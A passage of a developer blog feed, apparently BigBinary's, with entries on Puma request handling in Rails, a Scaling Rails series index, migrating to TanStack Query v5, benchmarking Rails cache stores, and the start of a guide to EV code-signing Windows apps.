       <content type="html"><![CDATA[<p><em>This is Part 1 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>.</em></p><p>If we do <code>rails new</code> to create a new Rails application, <a href="https://puma.io">Puma</a> will be the default web server. Let's start by explaining how Puma handles requests.</p><h2>How does Puma handle requests?</h2><p>Puma listens for incoming requests on a TCP socket. When a request comes in, that request is queued up in the socket. The request is then picked up by a Puma process. In Puma, a process is a separate OS process that runs an instance of the Rails application.</p><p><em>Note that the official Puma documentation calls a Puma process a Puma worker. Since the term &quot;worker&quot; might confuse people with background workers like Sidekiq or SolidQueue, in this article we have used the term &quot;Puma process&quot; in a few places to remove any ambiguity</em>.</p><p>Now, let's look at how a request is processed by Puma step-by-step.</p><p><img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/puma-internals.png" alt="Puma internals"></p><ol><li><p>All the incoming connections are added to the socket backlog, which is an OS-level queue that holds pending connections.</p></li><li><p>A separate thread (created by the <a href="https://msp-greg.github.io/puma/Puma/Reactor.html">Reactor</a> class) reads the connection from the socket backlog. As the name suggests, this Reactor class implements the <a href="https://en.wikipedia.org/wiki/Reactor_pattern">reactor pattern</a>. The reactor can manage multiple connections at a time thanks to non-blocking I/O and an event-driven architecture.</p></li><li><p>Once the incoming request is fully buffered in memory, the request is passed to the thread pool, where it resides in the <code>@todo</code> array.</p></li><li><p>A thread in the thread pool pulls a request from the <code>@todo</code> array and processes it. 
The thread calls the Rack application, which, in our case, is a Rails application, and generates a response.</p></li><li><p>The response is then sent back to the client via the same connection. Once this is complete, the thread is released back to the thread pool to handle the next item from the <code>@todo</code> array.</p></li></ol><h2>Modes in Puma</h2><ol><li><p><strong>Single Mode</strong>: In single mode, only a single Puma process boots, and it does not have any additional child processes. It is suitable only for applications with low traffic.</p><p><img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/single-mode.png" alt="Single mode"></p></li><li><p><strong>Cluster Mode</strong>: In cluster mode, Puma boots up a master process, which prepares the application and then invokes the <a href="https://en.wikipedia.org/wiki/Fork_(system_call)">fork()</a> system call to create one or more child processes. These processes are the ones that are responsible for handling requests. 
The master process monitors and manages these child processes.<img src="/blog_images/2025/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance/cluster-mode.png" alt="Cluster mode"></p></li></ol><h2>Default Puma configuration in a new Rails application</h2><p>When we create a new Rails 8 or higher application, the default Puma <code>config/puma.rb</code> will have the following code.</p><p><em>Please note that we are mentioning Rails 8 here because the Puma configuration is different in prior versions of Rails.</em></p><pre><code class="language-ruby">threads_count = ENV.fetch(&quot;RAILS_MAX_THREADS&quot;, 3)
threads threads_count, threads_count

rails_env = ENV.fetch(&quot;RAILS_ENV&quot;, &quot;development&quot;)
environment rails_env

case rails_env
when &quot;production&quot;
  workers_count = Integer(ENV.fetch(&quot;WEB_CONCURRENCY&quot;, 1))
  workers workers_count if workers_count &gt; 1

  preload_app!
when &quot;development&quot;
  worker_timeout 3600
end</code></pre><p>For a brand new Rails application, the env variables <code>RAILS_MAX_THREADS</code> and <code>WEB_CONCURRENCY</code> won't be set. This means <code>threads_count</code> will be set to 3 and <code>workers_count</code> will be 1.</p><p>Now let's look at the second line from the above-mentioned code.</p><pre><code class="language-ruby">threads threads_count, threads_count</code></pre><p>In the above code, <code>threads</code> is a method to which we are passing two arguments. The default value of <code>threads_count</code> is 3. So effectively, we are calling the <code>threads</code> method like this.</p><pre><code class="language-ruby">threads(3, 3)</code></pre><p>The <code>threads</code> method in Puma takes two arguments: <code>min</code> and <code>max</code>. These arguments specify the minimum and maximum number of threads that each Puma process will use to handle requests. 
In this case, Puma will initialize 3 threads in the thread pool.</p><p>Now let's look at the following line from the above-mentioned code.</p><pre><code class="language-ruby">workers workers_count if workers_count &gt; 1</code></pre><p>The value of <code>workers_count</code> in this case is <code>1</code>, so Puma will run in <strong>single</strong> mode. As mentioned earlier, in Puma a worker is basically a process. It's not a background job worker.</p><p>What we have seen is that if we don't specify <code>RAILS_MAX_THREADS</code> or <code>WEB_CONCURRENCY</code>, then, by default, Puma will boot a single process and that process will have three threads. In other words, Rails will boot with the ability to handle 3 requests concurrently.</p><p>This is the default Puma configuration for Rails booting in development or in production mode: a single process with three threads.</p><h2>Configuring Puma's concurrency and parallelism</h2><p>When it comes to concurrency and parallelism in Puma, there are two primary parameters we can configure: the number of threads each process will have and the number of processes we need.</p><p>To figure out the right value for each of these parameters, we need to know how Ruby works. Specifically, we need to know how the GVL in Ruby works and how it impacts the performance of Rails applications.</p><p>We also need to know what kind of Rails application it is. Is it a CPU-intensive application, an IO-intensive one, or somewhere in between?</p><p>Don't worry; in the next blog, we will start from the basics and discuss all this and much more.</p><p><em>This was Part 1 of our blog series on <a href="/blog/scaling-rails-series">scaling Rails applications</a>. If any part of the blog is not clear to you, please write to us on <a href="https://www.linkedin.com/company/bigbinary">LinkedIn</a>, <a href="https://twitter.com/bigbinary">Twitter</a> or via the <a href="https://bigbinary.com/contact">BigBinary website</a>.</em></p>]]></content>
    </entry><entry>
       <title><![CDATA[Scaling Rails Series]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/scaling-rails-series"/>
      <updated>2025-04-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/scaling-rails-series</id>
       <content type="html"><![CDATA[<p>Rails makes it pretty easy to get started with development. You don't even have to set up your database. It comes with SQLite. Install Rails, and you can start developing.</p><p>Same with deploying to production. You need to change your database. Other than that, it comes with sane defaults. You don't really need to know what <code>RAILS_MAX_THREADS</code> and <code>WEB_CONCURRENCY</code> are. However, as your application starts getting more traffic, you will want to scale it.</p><p>Over the last 13 years of consultancy at BigBinary, we have seen all types of applications.</p><p>We have seen Rails applications which are IO heavy, like those scraping websites. There are applications which are heavy on background jobs. Then there are flash sale sites where there is no traffic one minute and tons of traffic the next. Then there are ticketing sites.</p><p>Each application has its own challenges.</p><p>If an application is not properly tuned, then we can run into all kinds of issues. You can run out of memory or database connections. In some cases, because of the wrong configuration, Sidekiq jobs were failing and these jobs continued to get enqueued, which made the situation worse.</p><p>To solve all these types of issues, we need to know what's actually happening. And that's what we will do. We will look under the hood to see how Rails works, how Puma works, how connection pooling works, how to tune Sidekiq, and how to measure what we need to know to make decisions.</p><p>It's a journey to understand from the ground up how to scale Rails applications. This page will have links to all the future blogs. You can follow the Scaling Rails series by joining the newsletter or following us on <a href="https://twitter.com/bigbinary">Twitter</a> or <a href="https://www.linkedin.com/company/bigbinary/">LinkedIn</a>. 
We even have an <a href="https://bigbinary.com/blog/feed.xml">RSS feed</a>.</p><h3><a href="/blog/understanding-puma-concurrency-and-the-effect-of-the-gvl-on-performance">Part 1 - Understanding how Puma handles requests</a></h3><ul><li>How Puma handles requests</li><li>Default Puma configuration in a new Rails application</li></ul><h3><a href="/blog/gvl-in-ruby-and-its-impact-in-scaling-rails-applications">Part 2 - GVL in Ruby and the impact of GVL in scaling Rails applications</a></h3><ul><li>Web applications and CPU usage</li><li>CPU bound or IO bound</li><li>Concurrency vs Parallelism</li><li>Understanding the GVL</li><li>GVL dictates how many processes you will need</li><li>Thread switching</li><li>Visualizing the effect of the GVL</li></ul><h3><a href="/blog/amdahls-law-the-theoretical-relationship-between-speedup-and-concurrency">Part 3 - Amdahl's Law: The Theoretical Relationship Between Speedup and Concurrency</a></h3><ul><li>Amdahl's law</li><li>Relationship between speedup gained and the number of threads</li><li>Ideal number of threads in a process</li><li>Request queue time</li></ul><h3><a href="/blog/tuning-puma-max-threads-configuration-with-gvl-instrumentation">Part 4 - Finding the ideal number of threads per process using GVL Instrumentation</a></h3><ul><li>GVL instrumentation using perfm</li><li>Determining the I/O workload of an application using the GVL data</li><li>Empirically determining the ideal number of Puma threads for an application</li></ul><h3><a href="/blog/understanding-active-record-connection-pooling">Part 5 - Understanding Active Record Connection Pooling</a></h3><ul><li>Database connection pooling</li><li>Active Record connection pool implementation</li><li>Connection pool configuration options</li><li>Active Record connection pool reaper</li><li>How many database connections will the web and background processes utilize at maximum?</li><li>How does using <code>load_async</code> affect the connection usage?</li><li>Setting database pool 
size configuration</li><li>PgBouncer</li><li>Tracking down <code>ActiveRecord::ConnectionTimeoutError</code></li><li>Monitoring Active Record connection pool stats</li></ul><h3><a href="/blog/understanding-queueing-theory">Part 6 - Understanding Queueing Theory</a></h3><ul><li>Queueing systems</li><li>Basic terminology in queueing theory</li><li>Little's law</li><li>The knee curve</li><li>Theoretical parallelism</li><li>Concurrency and effective parallelism</li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Migrating to TanStack Query v5]]></title>
       <author><name>Gaagul C Gigi</name></author>
      <link href="https://www.bigbinary.com/blog/migrating-to-tanstack-query-v5"/>
      <updated>2025-03-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrating-to-tanstack-query-v5</id>
       <content type="html"><![CDATA[<p><a href="https://tanstack.com/query/latest">TanStack Query</a> is a powerful data-fetching and state management library. Since the release of TanStack Query v5, many developers upgrading to the new version have faced challenges in migrating their existing functionality. While the official documentation covers all the details, it can be overwhelming, making it easy to miss important updates.</p><p>In this blog, we'll explain the main updates in TanStack Query v5 and show how to make the switch smoothly.</p><p>For a complete list of changes, check out the <a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5">TanStack Query v5 Migration Guide</a>.</p><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#supports-a-single-signature-one-object">Simplified Function Signatures</a></h2><p>In previous versions of React Query, functions like <code>useQuery</code> and <code>useMutation</code> had multiple type overloads. 
This not only made type maintenance more complicated but also led to the need for runtime checks to validate the types of parameters.</p><p>To streamline the API, TanStack Query v5 introduces a simplified approach: a single object parameter containing the main parameters for each function.</p><ul><li>queryKey / mutationKey</li><li>queryFn / mutationFn</li><li>options</li></ul><p>Below are some examples of how commonly used hooks and <code>queryClient</code> methods have been restructured.</p><ul><li>Hooks:</li></ul><pre><code class="language-javascript">// before (Multiple overloads)
useQuery(key, fn, options);
useInfiniteQuery(key, fn, options);
useMutation(fn, options);
useIsFetching(key, filters);
useIsMutating(key, filters);

// after (Single object parameter)
useQuery({ queryKey, queryFn, ...options });
useInfiniteQuery({ queryKey, queryFn, ...options });
useMutation({ mutationFn, ...options });
useIsFetching({ queryKey, ...filters });
useIsMutating({ mutationKey, ...filters });</code></pre><ul><li><code>queryClient</code> methods:</li></ul><pre><code class="language-javascript">// before (Multiple overloads)
queryClient.isFetching(key, filters);
queryClient.getQueriesData(key, filters);
queryClient.setQueriesData(key, updater, filters, options);
queryClient.removeQueries(key, filters);
queryClient.cancelQueries(key, filters, options);
queryClient.invalidateQueries(key, filters, options);

// after (Single object parameter)
queryClient.isFetching({ queryKey, ...filters });
queryClient.getQueriesData({ queryKey, ...filters });
queryClient.setQueriesData({ queryKey, ...filters }, updater, options);
queryClient.removeQueries({ queryKey, ...filters });
queryClient.cancelQueries({ queryKey, ...filters }, options);
queryClient.invalidateQueries({ queryKey, ...filters }, options);</code></pre><p>This approach ensures developers can manage and pass parameters more cleanly, while maintaining a more manageable codebase with fewer type issues.</p><h2><a 
href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#callbacks-on-usequery-and-queryobserver-have-been-removed">Callbacks on useQuery and QueryObserver have been removed</a></h2><p>A significant change in TanStack Query v5 is the removal of callbacks such as <code>onError</code>, <code>onSuccess</code>, and <code>onSettled</code> from <code>useQuery</code> and <code>QueryObserver</code>. This change was made to avoid potential misconceptions about their behavior and to ensure more predictable and consistent side effects.</p><p>Previously, we could define <code>onError</code> directly within the <code>useQuery</code> hook to handle side effects, such as showing error messages. This eliminated the need for a separate <code>useEffect</code>.</p><pre><code class="language-javascript">const useUsers = () =&gt; {
  return useQuery({
    queryKey: [&quot;users&quot;, &quot;list&quot;],
    queryFn: fetchUsers,
    onError: error =&gt; {
      toast.error(error.message);
    },
  });
};</code></pre><p>With the removal of the <code>onError</code> callback, we now need to handle side effects using React's <code>useEffect</code>.</p><pre><code class="language-javascript">const useUsers = () =&gt; {
  const query = useQuery({
    queryKey: [&quot;users&quot;, &quot;list&quot;],
    queryFn: fetchUsers,
  });

  React.useEffect(() =&gt; {
    if (query.error) {
      toast.error(query.error.message);
    }
  }, [query.error]);

  return query;
};</code></pre><p>By using <code>useEffect</code>, the issue with this approach becomes much more apparent. For instance, if <code>useUsers()</code> is called twice within the application, it will trigger two separate error notifications. This is clear when inspecting the <code>useEffect</code> implementation, as each component calling the custom hook registers an independent effect. In contrast, with the <code>onError</code> callback, the behavior may not be as clear. 
We might expect errors to be combined, but they are not.</p><p>For these types of scenarios, we can use the global callbacks on the <code>queryCache</code>. These global callbacks will run only once for each query and cannot be overwritten, making them exactly what we need for more predictable side effect handling.</p><pre><code class="language-javascript">const queryClient = new QueryClient({
  queryCache: new QueryCache({
    onError: error =&gt; toast.error(`Something went wrong: ${error.message}`),
  }),
});</code></pre><p>Another common use case for callbacks was updating local state based on query data. While using callbacks for state updates can be straightforward, it may lead to unnecessary re-renders and intermediate render cycles with incorrect values.</p><p>For example, consider the scenario where a query fetches a list of 3 users and updates the local state with the fetched data.</p><pre><code class="language-javascript">export const useUsers = () =&gt; {
  const [usersCount, setUsersCount] = React.useState(0);

  const { data } = useQuery({
    queryKey: [&quot;users&quot;, &quot;list&quot;],
    queryFn: fetchUsers,
    onSuccess: data =&gt; {
      setUsersCount(data.length);
    },
  });

  return { data, usersCount };
};</code></pre><p>This example involves three render cycles:</p><ol><li>Initial Render: The <code>data</code> is undefined and <code>usersCount</code> is 0 while the query is fetching, which is the correct initial state.</li><li>After Query Resolution: Once the query resolves and <code>onSuccess</code> runs, <code>data</code> will be an array of 3 users. However, since <code>setUsersCount</code> is asynchronous, <code>usersCount</code> will remain 0 until the state update completes. This is wrong because the values are not in sync.</li><li>Final Render: After the state update completes, <code>usersCount</code> is updated to reflect the number of users (3), triggering a re-render. 
At this point, both <code>data</code> and <code>usersCount</code> are in sync and display the correct values.</li></ol><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#the-refetchinterval-callback-function-only-gets-query-passed">Updated the behavior of the refetchInterval callback function</a></h2><p>The <code>refetchInterval</code> callback now only receives the <code>query</code> object as its argument, instead of both <code>data</code> and <code>query</code> as it did before. This change simplifies how callbacks are invoked, and it resolves some typing issues that arose when callbacks were receiving data transformed by the <code>select</code> option.</p><p>To access the data within the query object, we can now use <code>query.state.data</code>. However, keep in mind that this will not include any transformations applied by the <code>select</code> option. If we need to access the transformed data, we'll need to manually reapply the transformation.</p><p>For example, consider the following code snippet:</p><pre><code class="language-javascript">const useUsers = () =&gt; {
  return useQuery({
    queryKey: [&quot;users&quot;, &quot;list&quot;],
    queryFn: fetchUsers,
    select: data =&gt; data.users,
    refetchInterval: (data, query) =&gt; {
      if (data?.length &gt; 0) {
        return 1000 * 60; // Refetch every minute if there is data
      }

      return false; // Don't refetch if there is no data
    },
  });
};</code></pre><p>This can now be refactored as follows:</p><pre><code class="language-javascript">const useUsers = () =&gt; {
  return useQuery({
    queryKey: [&quot;users&quot;, &quot;list&quot;],
    queryFn: fetchUsers,
    select: data =&gt; data.users,
    refetchInterval: query =&gt; {
      if (query.state.data?.users?.length &gt; 0) {
        return 1000 * 60; // Refetch every minute if there is data
      }

      return false; // Don't refetch if there is no data
    },
  });
};</code></pre><p>Similarly, the <code>refetchOnWindowFocus</code>,
<code>refetchOnMount</code>, and <code>refetchOnReconnect</code> callbacks now only receive the <code>query</code> as an argument.</p><p>Below are the changes to the type signature for the <code>refetchInterval</code> callback function:</p><pre><code class="language-javascript">// before
refetchInterval: number | false | ((data: TData | undefined, query: Query)
  =&gt; number | false | undefined)

// after
refetchInterval: number | false | ((query: Query) =&gt; number | false | undefined)</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#renamed-cachetime-to-gctime">Renamed cacheTime to gcTime</a></h2><p>The term <code>cacheTime</code> is often misunderstood as the duration for which data is cached. However, it actually defines how long data remains in the cache after a query becomes unused. During this period, the data remains active and accessible. Once the query is no longer in use and the specified <code>cacheTime</code> elapses, the data is considered for &quot;garbage collection&quot; to prevent the cache from growing excessively.
Therefore, the term <code>gcTime</code> more accurately describes this behavior.</p><pre><code class="language-javascript">const MINUTE = 1000 * 60;

const queryClient = new QueryClient({
  defaultOptions: {
    queries: {
-     // cacheTime: 10 * MINUTE, // before
+     gcTime: 10 * MINUTE, // after
    },
  },
})</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#removed-keeppreviousdata-in-favor-of-placeholderdata-identity-function">Removed keepPreviousData option in favor of placeholderData</a></h2><p>The <code>keepPreviousData</code> option and the <code>isPreviousData</code> flag have been removed in TanStack Query v5, as their functionality was largely redundant with the <code>placeholderData</code> and <code>isPlaceholderData</code> options.</p><p>To replicate the behavior of <code>keepPreviousData</code>, the previous query data is now passed as a parameter to the <code>placeholderData</code> option. This option can accept an identity function to return the previous data, effectively mimicking the same behavior.
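As an illustration of that identity-function approach, here is a minimal sketch (not from the original post; `fetchUsers`, `identity`, and `buildUsersQueryOptions` are hypothetical names introduced for this example):

```javascript
// Sketch: keeping previous data visible via an identity placeholderData.
// `fetchUsers` is a hypothetical fetcher; only the option shape matters here.
const fetchUsers = page => Promise.resolve({ users: [], page });

// The identity function hands the previous query's data back as placeholder.
const identity = previousData => previousData;

const buildUsersQueryOptions = page => ({
  queryKey: ["users", "list", page],
  queryFn: () => fetchUsers(page),
  // While page N+1 loads, the UI keeps showing page N's data.
  placeholderData: identity,
});
```

Passing these options to `useQuery` reproduces the old `keepPreviousData: true` behavior, with `isPlaceholderData` playing the role of the removed `isPreviousData` flag.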
Additionally, TanStack Query provides a built-in utility function, <code>keepPreviousData</code>, which can be used directly with <code>placeholderData</code> to achieve the same effect as in previous versions.</p><p>Here's how we can use <code>placeholderData</code> to replicate the functionality of <code>keepPreviousData</code>:</p><pre><code class="language-javascript">import {
  useQuery,
+ keepPreviousData // Built-in utility function
} from &quot;@tanstack/react-query&quot;;

const {
  data,
- // isPreviousData,
+ isPlaceholderData, // New
} = useQuery({
  queryKey,
  queryFn,
- // keepPreviousData: true,
+ placeholderData: keepPreviousData // New
});</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#infinite-queries-now-need-a-initialpageparam">Infinite queries now need an initialPageParam</a></h2><p>In previous versions of TanStack Query, <strong><code>undefined</code></strong> was passed as the default page parameter to the query function in infinite queries. This led to potential issues with non-serializable <code>undefined</code> data being stored in the query cache.</p><p>To resolve this, TanStack Query v5 introduces an explicit <code>initialPageParam</code> parameter in the infinite query options.
This ensures that the page parameter is always defined, preventing caching issues and making the query state more predictable.</p><pre><code class="language-javascript">useInfiniteQuery({
  queryKey,
- // queryFn: ({ pageParam = 0 }) =&gt; fetchSomething(pageParam),
  queryFn: ({ pageParam }) =&gt; fetchSomething(pageParam),
+ initialPageParam: 0, // New
  getNextPageParam: (lastPage) =&gt; lastPage.next,
})</code></pre><h2><a href="https://tanstack.com/query/latest/docs/framework/react/guides/migrating-to-v5#status-loading-has-been-changed-to-status-pending-and-isloading-has-been-changed-to-ispending-and-isinitialloading-has-now-been-renamed-to-isloading">Status and flag updates</a></h2><p>The <code>loading</code> status is now called <code>pending</code>, and the <code>isLoading</code> flag has been renamed to <code>isPending</code>. This change also applies to mutations.</p><p>Additionally, a new <code>isLoading</code> flag has been added for queries. It is now defined as the logical AND of <code>isPending</code> and <code>isFetching</code> (<code>isPending &amp;&amp; isFetching</code>). This means that <code>isLoading</code> behaves the same as the previous <code>isInitialLoading</code>. However, since <code>isInitialLoading</code> is being phased out, it will be removed in the next major version.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Benchmarking caching in Rails with Redis vs the alternatives]]></title>
       <author><name>Sandip Mane</name></author>
      <link href="https://www.bigbinary.com/blog/caching-in-rails-with-redis-vs-alternatives"/>
      <updated>2025-02-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/caching-in-rails-with-redis-vs-alternatives</id>
      <content type="html"><![CDATA[<p>Recently, we have seen the rise of Redis alternatives. Some of them claimedsubstantial performance gains. We did this benchmarking to see how muchperformance gain one would get by switching from Redis to one of thealternatives.</p><p>We explored several new contenders like <a href="https://valkey.io/">Valkey</a>,<a href="https://www.dragonflydb.io/">DragonflyDB</a>, and <a href="https://dicedb.io/">DiceDB</a>,which serve as drop-in Redis replacements. We also looked at Rails' own<a href="https://github.com/rails/solid_cache">SolidCache</a>, which challenges in-memorystorage by favoring database-based approach. For this comparison, we included a<a href="https://andyatkinson.com/solid-cache-rails-postgresql#postgresql-optimizations">tuned SolidCache for PostgreSQL</a>,as suggested by <a href="https://x.com/andatki">Andrew Atkinson</a>. We also included<a href="https://fractaledmind.github.io/2024/10/16/sqlite-supercharges-rails/">SolidCache with sqlite3</a>,inspired by Stephen Margheim, who claims to offer significant performance gains.Finally, we added <a href="https://github.com/oldmoe/litestack">litecache with sqlite3</a>to compare it directly against SolidCache.</p><p>Although SolidCache brings various advantages to Rails, this benchmarkingfocused solely on pure performance.</p><h2>Benchmarking details</h2><p>We used<a href="https://gist.github.com/sandip-mane/e4671c3cd01c247a5e8ff9133aa2eca6">this script</a>for benchmarking. It performed 100k read and write operations on a DigitalOceandroplet with a 4GB RAM, 25GB SSD Ubuntu 24.10 x64 setup running a Rails 8application.</p><p>In the case of &quot;Single thread benchmarking&quot; only one thread was created. 
&quot;Multithread benchmarking&quot; had five threads.</p><p>The data gathered is based on running the same tests five times, with the averages calculated.</p><p>A simpler version of the script looks like this.</p><pre><code class="language-rb">require &quot;benchmark&quot;

# Run it in the SolidCache with PG-tuned setup
# ActiveRecord::Base
#   .connection
#   .execute(&quot;SELECT pg_prewarm('solid_cache_entries')&quot;)

# Run the benchmarking for 100k reads and writes
n = 100_000

def cache_fetch(i)
  Rails.cache.fetch([&quot;key&quot;, i], expires_in: 5.minutes) do
    &quot;Hello World!&quot;
  end
end

# Clear the existing cache
Rails.cache.clear

puts &quot;\nSingle thread:&quot;
Benchmark.bm(6) do |x|
  x.report(&quot;write&quot;) {
    n.times { |i| cache_fetch(i) }
  }
  x.report(&quot;read&quot;) {
    n.times { |i| cache_fetch(i) }
  }
end

# Spawn &quot;x&quot; threads and run &quot;n&quot; operations combined
def spawn_threads(x = 5, n)
  threads = []
  x.times do
    threads &lt;&lt; Thread.new do
      (n/x).times { |i| cache_fetch(i) }
    end
  end
  threads.each(&amp;:join)
end

# Clear cache again before running another benchmark
Rails.cache.clear

puts &quot;\nMultiple threads:&quot;
Benchmark.bm(6) do |x|
  x.report(&quot;write&quot;) {
    spawn_threads(5, n)
  }
  x.report(&quot;read&quot;) {
    spawn_threads(5, n)
  }
end</code></pre><h3>Single thread performance</h3><p><img src="/blog_images/2025/caching-in-rails-with-redis-vs-alternatives/single-thread.png" alt="code"></p><p>For our comparison, we used Redis as the baseline.</p><p>Memcached performs similarly to Redis, with Redis having a slight edge in the benchmark results. However, this difference is unlikely to be significant in a real-world application.</p><p>Valkey and DiceDB deliver similar performance, with Valkey having a slight edge in both read and write operations.
However, Redis still remains 1.5x faster than both.</p><p>DragonflyDB (not shown in the graph) performed significantly slower in the benchmarks, which is why it was excluded. However, its performance in Rails 7 was comparable to Valkey, suggesting it may require optimizations for Rails 8.</p><p>SolidCache on PostgreSQL is approximately twice as slow as Redis for read operations and the slowest for writes among all options. However, the tuned version improves performance significantly, making it 1.5x faster than the standard PostgreSQL setup. Consider optimizing your cache database if you want to get maximum performance benefits.</p><p>SolidCache with SQLite3 has shown significant improvement, with read speeds now comparable to Redis and write speeds surpassing those of a tuned PostgreSQL setup.</p><p>Finally, litecache with sqlite3 delivers exceptional performance, being approximately 4x faster in read operations and 2.5x faster in writes compared to Redis, making it the fastest option available for Rails and Ruby applications.</p><h3>Multithreaded performance</h3><p><img src="/blog_images/2025/caching-in-rails-with-redis-vs-alternatives/multi-thread.png" alt="code"></p><p>In this test, Redis, Memcached, Valkey, and DiceDB performed similarly to the single-thread benchmarks, with slight improvements in write operations. Redis maintained its position as the top performer, continuing to outpace the others.</p><p>Unfortunately, SolidCache with PostgreSQL was the slowest option.
However, when tuned, it significantly improved write performance, highlighting the importance of optimizing the database for better results.</p><p>Surprisingly, SolidCache with SQLite3 delivered performance on par with the Redis alternatives while outperforming a tuned PostgreSQL setup by a factor of two, effectively doubling its speed.</p><p>Additionally, LiteCache with SQLite3 outperformed its own single-thread performance in write operations, making it an impressive 4x faster than Redis in both read and write operations.</p><h3>Summary</h3><p>It's clear that while data stores like Valkey, Dragonfly, and others claim significantly better performance than Redis, using them through Rails APIs doesn't fully leverage those advantages, leading to performance levels similar to Redis.</p><p>SolidCache with PostgreSQL offers benefits such as fewer dependencies and easier maintenance, but it was the slowest performer in this test, with high memory consumption. However, if you must use SolidCache with PostgreSQL, tuning it as recommended by Andrew Atkinson is crucial, as it can notably enhance write performance.</p><p>On the other hand, SolidCache with SQLite3 was a pleasant surprise, particularly in the multi-threaded test, where it performed on par with Redis. For a database-backed caching solution, this is impressively fast.</p><p>Lastly, while LiteCache with SQLite3 is the fastest option, boasting a significant 4x performance gain, it's not recommended for several reasons. First, it doesn't yet support Rails 8 (we used a forked branch for this test). Second, the <a href="https://github.com/oldmoe/litestack">litestack</a> gem required for this comes bundled with a variety of additional addons, such as LiteJob, LiteCable, and others. Adding this entire suite of packages just for LiteCache doesn't make sense. Finally, since the package is still new and in its early stages, we would not recommend using it for production applications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How to remotely EV code-sign a Windows application using ssl.com]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com"/>
      <updated>2024-12-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 9 of the blog series. You can also read about<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/publish-electron-application">part 2</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a>and <a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a>.</em></p><p>Code-signing allows Windows to verify the identity of an application'spublisher, making it authentic and trustworthy. Additionally, code-signing helpsapplications comply with Windows security policies, avoiding warnings andinstallation blocks, ultimately building user confidence and providing asmoother, safer experience.</p><h3>What is code-signing?</h3><p>At its core, code-signing involves using a cryptographic hash function to createa unique digital fingerprint of the code. This fingerprint and a certificatefrom a trusted Certificate Authority (CA) form the digital signature. 
When users download and run the software, their operating system or browser checks the digital signature to verify its authenticity.</p><p>There are two types of certificates we can use to sign a Windows application:</p><ul><li>Code-signing Certificate</li><li>EV Code-signing Certificate</li></ul><p>A <strong>Standard Code-signing Certificate</strong> provides our application with a baseline level of security and trust. While it verifies the software publisher's identity and ensures that the code has not been tampered with since it was signed, the validation process is less rigorous than for EV certificates. It shows a warning during installation that goes away once enough users have installed our application and we've built up trust.</p><p><strong>Extended Validation (EV) Code-signing Certificates</strong>, on the other hand, offer the highest level of security and trust. These certificates require a more rigorous vetting process by the Certificate Authority (CA) before they are issued, ensuring that the entity requesting the certificate is thoroughly verified. This process involves verifying the legal, physical, and operational existence of the entity, as well as confirming the identity of the individual requesting the certificate.</p><p>Unlike Apple, Microsoft allows developers to purchase these certificates on the open market. They are typically sold by the same companies that offer HTTPS certificates. Prices can vary, so it's worth shopping around.
Some popular resellers include:</p><ul><li><a href="https://www.digicert.com/signing/code-signing-certificates">DigiCert code-signing certificate</a></li><li><a href="https://shop.certum.eu/data-security/code-signing-certificates/certum-ev-code-sigining.html">Certum EV code-signing certificate</a></li><li><a href="https://www.entrust.com/products/digital-signing/code-signing-certificates">Entrust code-signing certificate</a></li><li><a href="https://www.ssl.com/certificates/ev-code-signing/">SSL.com EV code-signing certificate</a></li></ul><h3>Why choose EV code-signing?</h3><p>EV code-signing certificates are comparatively pricier than standard code-signing certificates and involve a more rigorous vetting process. Even so, it is important to note that, effective June 2023, the <a href="https://cabforum.org/wp-content/uploads/Baseline-Requirements-for-the-Issuance-and-Management-of-Code-Signing.v3.2.pdf">new CA/Browser Forum code-signing requirements</a> are in effect. As a result, publicly trusted Certificate Authorities (CAs) require that certificate requestors use an appropriately certified (FIPS 140-2 level 2 or Common Criteria EAL 4+) hardware security module (HSM) to protect their code-signing private keys. This requirement applies to the issuance of both extended validation (EV) certificates and non-EV certificates.</p><p>In simple words, this means that standard code-signing certificates no longer provide the benefits they provided in the past. Windows will treat our application as completely unsigned and display the equivalent warning dialogs. Another thing to note here is that since certificates are required to be stored on an HSM, the certificate cannot simply be downloaded onto a CI infrastructure.</p><h3>Cloud-based EV code-signing</h3><p>In the past, EV code-signing could only be performed using a physical USB dongle. Upon purchasing an EV certificate, the provider would send a physical USB device containing the certificate.
